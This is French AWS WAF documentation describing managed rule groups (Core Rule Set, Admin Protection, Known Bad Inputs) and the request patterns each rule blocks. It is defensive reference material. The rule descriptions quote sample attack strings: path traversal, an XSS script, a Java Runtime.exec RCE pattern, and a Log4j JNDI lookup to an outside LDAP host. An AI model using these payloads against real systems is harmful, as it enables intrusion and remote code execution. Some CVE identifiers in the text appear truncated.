Ensemble de règles de base (CRS)Protection de l'administrateur Entrées erronées connues

Groupes de règles de référence

Les groupes de règles gérées de base offrent une protection générale contre une grande variété de menaces courantes. Choisissez un ou plusieurs de ces groupes de règles pour établir une protection de base pour vos ressources.

Note

Les informations que nous publions concernant les règles des groupes de règles AWS gérées sont destinées à vous fournir suffisamment d'informations pour utiliser les règles, sans fournir d'informations que des acteurs malveillants pourraient utiliser pour contourner les règles. Si vous avez besoin de plus d'informations que celles que vous trouverez dans cette documentation, contactez le AWS Support Centre.

Groupe de règles géré par un ensemble de règles de base (CRS)

VendorName:AWS, Nom :AWSManagedRulesCommonRuleSet, WCU : 700

Le groupe de règles de base (CRS) contient des règles généralement applicables aux applications Web. Cela fournit une protection contre l'exploitation d'un large éventail de vulnérabilités, y compris certaines des vulnérabilités à haut risque et fréquentes décrites dans les publications de l'OWASP telles que le Top 10 de l'OWASP. Envisagez d'utiliser ce groupe de règles pour tous les cas AWS WAF d'utilisation.

Ce groupe de règles géré ajoute des libellés aux requêtes Web qu'il évalue, qui sont disponibles pour les règles exécutées après ce groupe de règles dans votre ACL Web. AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous Utilisation d'étiquettes sur les requêtes Web aux sections etMétriques et dimensions des étiquettes.

Note

Ce tableau décrit la dernière version statique de ce groupe de règles. Pour les autres versions, utilisez la commande API DescribeManagedRuleGroup.

Nom de la règle	Description et étiquette
`NoUserAgent_HEADER`	Vérifie les requêtes pour lesquelles il manque l'`User-Agent`en-tête HTTP. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:NoUserAgent_Header`
`UserAgent_BadBots_HEADER`	Vérifie les valeurs `User-Agent` d'en-tête communes qui indiquent que la demande est un robot défectueux. Les exemples de modèles incluent `nessus` et `nmap`. Pour la gestion des bots, voir égalementAWS WAF Groupe de règles Bot Control. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:BadBots_Header`
`SizeRestrictions_QUERYSTRING`	Inspecte les chaînes de requête d'URI de plus de 2 048 octets. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString`
`SizeRestrictions_Cookie_HEADER`	Vérifie la présence d'en-têtes de cookies de plus de 10 240 octets. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header`
`SizeRestrictions_BODY`	Vérifie les corps de demande dont la taille est supérieure à 8 Ko (8 192 octets). Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:SizeRestrictions_Body`
`SizeRestrictions_URIPATH`	Inspecte les chemins d'URI de plus de 1 024 octets. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath`
`EC2MetaDataSSRF_BODY`	Inspecte les tentatives d'exfiltration des métadonnées Amazon EC2 du corps de la demande. Avertissement Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille limite pour l'ACL Web et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour CloudFront API Gateway, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans votre configuration ACL Web. Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour plus d’informations, consultez Gestion des composants de requête Web surdimensionnés dans AWS WAF. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body`
`EC2MetaDataSSRF_COOKIE`	Détecte les tentatives d'exfiltration des métadonnées Amazon EC2 du cookie de demande. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie`
`EC2MetaDataSSRF_URIPATH`	Inspecte les tentatives d'exfiltration des métadonnées Amazon EC2 depuis le chemin de l'URI de la demande. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath`
`EC2MetaDataSSRF_QUERYARGUMENTS`	Inspecte les tentatives d'exfiltration des métadonnées Amazon EC2 à partir des arguments de requête. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments`
`GenericLFI_QUERYARGUMENTS`	Inspecte la présence d'exploits LFI (Local File Inclusion) dans les arguments de la demande. Les exemples incluent les tentatives de traversée de chemin en utilisant des techniques comme `../../`. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments`
`GenericLFI_URIPATH`	Inspecte la présence d'exploits LFI (Local File Inclusion) dans le chemin d'URI. Les exemples incluent les tentatives de traversée de chemin en utilisant des techniques comme `../../`. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericLFI_URIPath`
`GenericLFI_BODY`	Inspecte la présence d'exploits LFI (Local File Inclusion) dans le corps de la demande. Les exemples incluent les tentatives de traversée de chemin en utilisant des techniques comme `../../`. Avertissement Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille limite pour l'ACL Web et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour CloudFront API Gateway, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans votre configuration ACL Web. Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour plus d’informations, consultez Gestion des composants de requête Web surdimensionnés dans AWS WAF. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericLFI_Body`
`RestrictedExtensions_URIPATH`	Vérifie les demandes dont les chemins d'URI contiennent des extensions de fichiers système dont la lecture ou l'exécution ne sont pas sûres. Les exemples de modèles incluent des extensions comme `.log` et `.ini`. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath`
`RestrictedExtensions_QUERYARGUMENTS`	Vérifie les demandes dont les arguments de requête contiennent des extensions de fichiers système dont la lecture ou l'exécution ne sont pas sûres. Les exemples de modèles incluent des extensions comme `.log` et `.ini`. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments`
`GenericRFI_QUERYARGUMENTS`	Inspecte les valeurs de tous les paramètres de requête pour détecter les tentatives d'exploitation de RFI (Remote File Inclusion) dans les applications Web en incorporant des URL contenant des adresses IPv4. Les exemples incluent des modèles tels que `http://https://`,`ftp://`,`ftps://`, et`file://`, avec un en-tête d'hôte IPv4 dans la tentative d'exploitation. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments`
`GenericRFI_BODY`	Inspecte le corps de la demande pour détecter toute tentative d'exploitation de RFI (Remote File Inclusion) dans les applications Web en incorporant des URL contenant des adresses IPv4. Les exemples incluent des modèles tels que `http://https://`,`ftp://`,`ftps://`, et`file://`, avec un en-tête d'hôte IPv4 dans la tentative d'exploitation. Avertissement Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille limite pour l'ACL Web et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour CloudFront API Gateway, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans votre configuration ACL Web. Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour plus d’informations, consultez Gestion des composants de requête Web surdimensionnés dans AWS WAF. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericRFI_Body`
`GenericRFI_URIPATH`	Inspecte le chemin de l'URI pour détecter les tentatives d'exploitation de RFI (Remote File Inclusion) dans les applications Web en incorporant des URL contenant des adresses IPv4. Les exemples incluent des modèles tels que `http://https://`,`ftp://`,`ftps://`, et`file://`, avec un en-tête d'hôte IPv4 dans la tentative d'exploitation. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:GenericRFI_URIPath`
`CrossSiteScripting_COOKIE`	Inspecte les valeurs des en-têtes de cookies pour détecter les modèles courants de script intersite (XSS) à l'aide de la fonction intégrée. AWS WAF Instruction d'attaque par scripts inter-site de règle Les exemples de modèles incluent des scripts comme `<script>alert("hello")</script>`. Note Les détails de correspondance des règles dans les AWS WAF journaux ne sont pas renseignés pour la version 2.0 de ce groupe de règles. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie`
`CrossSiteScripting_QUERYARGUMENTS`	Inspecte les valeurs des arguments de requête pour détecter les modèles de script intersite (XSS) courants à l'aide de la fonction intégrée. AWS WAF Instruction d'attaque par scripts inter-site de règle Les exemples de modèles incluent des scripts comme `<script>alert("hello")</script>`. Note Les détails de correspondance des règles dans les AWS WAF journaux ne sont pas renseignés pour la version 2.0 de ce groupe de règles. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments`
`CrossSiteScripting_BODY`	Inspecte le corps de la requête à la recherche de modèles de script intersite (XSS) courants à l'aide de la fonction intégrée. AWS WAF Instruction d'attaque par scripts inter-site de règle Les exemples de modèles incluent des scripts comme `<script>alert("hello")</script>`. Note Les détails de correspondance des règles dans les AWS WAF journaux ne sont pas renseignés pour la version 2.0 de ce groupe de règles. Avertissement Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille limite pour l'ACL Web et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour CloudFront API Gateway, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans votre configuration ACL Web. Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour plus d’informations, consultez Gestion des composants de requête Web surdimensionnés dans AWS WAF. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body`
`CrossSiteScripting_URIPATH`	Inspecte la valeur du chemin d'URI pour détecter les modèles de script intersite (XSS) courants à l'aide de la fonction intégrée. AWS WAF Instruction d'attaque par scripts inter-site de règle Les exemples de modèles incluent des scripts comme `<script>alert("hello")</script>`. Note Les détails de correspondance des règles dans les AWS WAF journaux ne sont pas renseignés pour la version 2.0 de ce groupe de règles. Action de la règle Block Libellé : `awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath`

Groupe de règles géré par la protection des administrateurs

VendorName:AWS, Nom :AWSManagedRulesAdminProtectionRuleSet, WCU : 100

Le groupe de règles Protection administrateur contient des règles qui vous permettent de bloquer l'accès externe aux pages administratives exposées. Cela peut être utile si vous exécutez un logiciel tiers ou si vous souhaitez réduire le risque qu'un acteur malveillant accède à votre application comme administrateur.

Note

Ce tableau décrit la dernière version statique de ce groupe de règles. Pour les autres versions, utilisez la commande API DescribeManagedRuleGroup.

Nom de la règle Description et étiquette

Nom de la règle	Description et étiquette
`AdminProtection_URIPATH`	Inspecte les chemins d'URI qui sont généralement réservés à l'administration d'un serveur Web ou d'une application. Les exemples de modèles incluent `sqlmanager`. Action de la règle Block Libellé : `awswaf:managed:aws:admin-protection:AdminProtection_URIPath`

AdminProtection_URIPATH

Inspecte les chemins d'URI qui sont généralement réservés à l'administration d'un serveur Web ou d'une application. Les exemples de modèles incluent sqlmanager.

Action de la règle Block

Libellé : awswaf:managed:aws:admin-protection:AdminProtection_URIPath

Groupe de règles géré pour les entrées erronées connues

VendorName:AWS, Nom :AWSManagedRulesKnownBadInputsRuleSet, WCU : 200

Le groupe de règles Known Bad Inputs (Entrées défectueuses connues) contient des règles permettant de bloquer les modèles de demande connus comme non valides et associés à l'exploitation ou à la découverte de vulnérabilités. Cela peut aider à réduire le risque qu'un acteur malveillant ne découvre une application vulnérable.

Note

Ce tableau décrit la dernière version statique de ce groupe de règles. Pour les autres versions, utilisez la commande API DescribeManagedRuleGroup.

Nom de la règle	Description et étiquette
`JavaDeserializationRCE_HEADER`	Inspecte les clés et les valeurs des en-têtes de requêtes HTTP pour détecter des modèles indiquant des tentatives d'exécution de commandes à distance (RCE) de Java, tels que les vulnérabilités Spring Core et Cloud Function RCE (CVE-22963, CVE-22965). Les exemples de modèles incluent `(java.lang.Runtime).getRuntime().exec("whoami")`. Avertissement Cette règle inspecte uniquement les 8 premiers Ko des en-têtes de demande ou les 200 premiers en-têtes, selon la première limite atteinte, et utilise l'`Continue`option de gestion du contenu surdimensionné. Pour plus d’informations, consultez Gestion des composants de requête Web surdimensionnés dans AWS WAF. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header`
`JavaDeserializationRCE_BODY`	Inspecte le corps de la demande pour détecter des modèles indiquant des tentatives d'exécution de commandes à distance (RCE) de Java, tels que les vulnérabilités Spring Core et Cloud Function RCE (CVE-22963, CVE-22965). Les exemples de modèles incluent `(java.lang.Runtime).getRuntime().exec("whoami")`. Avertissement Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille limite pour l'ACL Web et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour CloudFront API Gateway, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans votre configuration ACL Web. Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour plus d’informations, consultez Gestion des composants de requête Web surdimensionnés dans AWS WAF. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body`
`JavaDeserializationRCE_URIPATH`	Inspecte l'URI de la demande pour détecter des modèles indiquant des tentatives d'exécution de commandes à distance (RCE) de désérialisation en Java, tels que les vulnérabilités Spring Core et Cloud Function RCE (CVE-22963, CVE-22965). Les exemples de modèles incluent `(java.lang.Runtime).getRuntime().exec("whoami")`. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath`
`JavaDeserializationRCE_QUERYSTRING`	Inspecte la chaîne de requête à la recherche de modèles indiquant des tentatives d'exécution à distance (RCE) de désérialisation en Java, tels que les vulnérabilités Spring Core et Cloud Function RCE (CVE-22963, CVE-22965). Les exemples de modèles incluent `(java.lang.Runtime).getRuntime().exec("whoami")`. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString`
`Host_localhost_HEADER`	Inspecte l'en-tête de l'hôte dans la demande pour les modèles indiquant localhost. Les exemples de modèles incluent `localhost`. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header`
`PROPFIND_METHOD`	Inspecte la méthode HTTP dans la requête pour `PROPFIND`, qui est une méthode similaire à `HEAD`, mais avec l'intention supplémentaire d'exfiltrer des objets XML. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Propfind_Method`
`ExploitablePaths_URIPATH`	Inspecte le chemin URI pour les tentatives d'accès aux chemins d'application Web exploitables. Les exemples de modèles incluent des chemins comme `web-inf`. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath`
`Log4JRCE_HEADER`	Inspecte les clés et les valeurs des en-têtes de requête pour détecter la présence de la vulnérabilité Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) et protège contre les tentatives d'exécution de code à distance (RCE). Les exemples de modèles incluent `${jndi:ldap://example.com/}`. Avertissement Cette règle inspecte uniquement les 8 premiers Ko des en-têtes de demande ou les 200 premiers en-têtes, selon la première limite atteinte, et utilise l'`Continue`option de gestion du contenu surdimensionné. Pour plus d’informations, consultez Gestion des composants de requête Web surdimensionnés dans AWS WAF. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header`
`Log4JRCE_QUERYSTRING`	Inspecte la chaîne de requête pour détecter la présence de la vulnérabilité Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) et protège contre les tentatives d'exécution de code à distance (RCE). Les exemples de modèles incluent `${jndi:ldap://example.com/}`. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString`
`Log4JRCE_BODY`	Inspecte le corps pour détecter la présence de la vulnérabilité Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) et protège contre les tentatives d'exécution de code à distance (RCE). Les exemples de modèles incluent `${jndi:ldap://example.com/}`. Avertissement Cette règle inspecte uniquement le corps de la demande jusqu'à la limite de taille limite pour l'ACL Web et le type de ressource. Pour Application Load Balancer et AWS AppSync, la limite est fixée à 8 Ko. Pour CloudFront API Gateway, Amazon Cognito, App Runner et Verified Access, la limite par défaut est de 16 Ko et vous pouvez l'augmenter jusqu'à 64 Ko dans votre configuration ACL Web. Cette règle utilise l'`Continue`option de gestion du contenu surdimensionné. Pour plus d’informations, consultez Gestion des composants de requête Web surdimensionnés dans AWS WAF. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body`
`Log4JRCE_URIPATH`	Inspecte le chemin de l'URI pour détecter la présence de la vulnérabilité Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) et protège contre les tentatives d'exécution de code à distance (RCE). Les exemples de modèles incluent `${jndi:ldap://example.com/}`. Action de la règle Block Libellé : `awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath`

Avertissement JavaScript est désactivé ou n'est pas disponible dans votre navigateur.

Pour que vous puissiez utiliser la documentation AWS, Javascript doit être activé. Vous trouverez des instructions sur les pages d'aide de votre navigateur.

Conventions de rédaction

AWS Liste des groupes de règles gérées

Groupes de règles spécifiques au cas d'utilisation